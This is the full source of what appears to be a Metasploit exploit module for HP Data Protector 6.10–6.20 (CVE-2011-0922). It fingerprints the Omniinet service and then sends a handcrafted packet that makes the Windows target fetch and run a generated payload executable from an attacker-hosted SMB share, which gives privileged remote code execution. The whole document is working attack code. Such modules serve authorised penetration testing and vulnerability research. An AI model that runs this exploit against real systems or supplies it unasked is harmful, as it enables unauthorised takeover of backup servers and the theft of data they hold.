HP Data Protector 6.10 / 6.11 / 6.20 Install Service

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'HP Data Protector 6.10/6.11/6.20 Install Service',
      'Description'    => %q{
        This module exploits HP Data Protector Omniinet process on Windows only.
        This exploit invokes the install service function which allows an attacker to create a
        custom payload in the format of an executable.

        To ensure this works, the SMB server created in MSF must have a share called Omniback
        which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\
      },
      'Author'         => [
        'Ben Turner',
      ],
      'References'     =>
        [
          ['CVE', '2011-0922'],
          ['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Privileged'     => true,
      'Platform'       => 'win',
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        =>
        [
          [ 'HP Data Protector 6.10/6.11/6.20 / Windows', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 02 2011'))

      register_options(
        [
          Opt::RPORT(5555),
          OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
        ], self.class)

      deregister_options('FOLDER_NAME')
      deregister_options('FILE_CONTENTS')
      deregister_options('SHARE')
      deregister_options('FILE_NAME')
  end

  def peer
    "#{rhost}:#{rport}"
  end

  def check
    fingerprint = get_fingerprint

    if fingerprint.nil?
      vprint_status('Unable to fingerprint because no response.')
      return Exploit::CheckCode::Unknown
    end

    vprint_status("#{peer} - #{fingerprint}")

    if fingerprint =~ /HP Data Protector A\.06\.(\d+)/i
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Detected
  end

  def get_fingerprint
    ommni = connect
    ommni.put(rand_text_alpha_upper(64))
    resp = ommni.get_once(-1)
    disconnect

    return nil if resp.nil?

    # Delete unicode last null
    Rex::Text.to_ascii(resp).chop.chomp
  end

  def primer
    self.file_contents = generate_payload_exe
    self.file_name = "installservice.exe"
    self.share = "Omniback\\i386"

    print_status("File available on #{unc}...")
    vprint_status("#{peer} - Trying to execute remote EXE...")

    lhost = "#{datastore['SRVHOST']}"
    lhostfull = ""
    lhost.each_char do |character|
      lhostfull = lhostfull << "\x00" << character
    end

    packet = "\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"
    packet << lhostfull
    packet << "\x00\x00\x00\x20\x00\x30\x00"
    packet << "\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
    packet << "\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
    packet << "\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
    packet << "\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
    packet << "\x5c"
    packet << lhostfull
    packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
    packet << "\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
    packet << "\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
    packet << "\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
    packet << "\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
    packet << "\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"
    packet << "\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"
    packet << lhostfull
    packet << "\x5c\x00\x5c\x00\x4f\x00"
    packet << "\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
    packet << "\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
    packet << "\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
    packet << "\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
    packet << "\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
    packet << "\x5c\x00\x5c"
    packet << lhostfull
    packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
    packet << "\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"
    packet << "\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
    packet << "\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
    packet << "\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"
    packet << lhostfull
    packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
    packet << "\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"

    connect
    sock.put(packet)
    disconnect
  end

  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) {super}
    rescue Timeout::Error
      # Stop SMB Server
    end
  end
end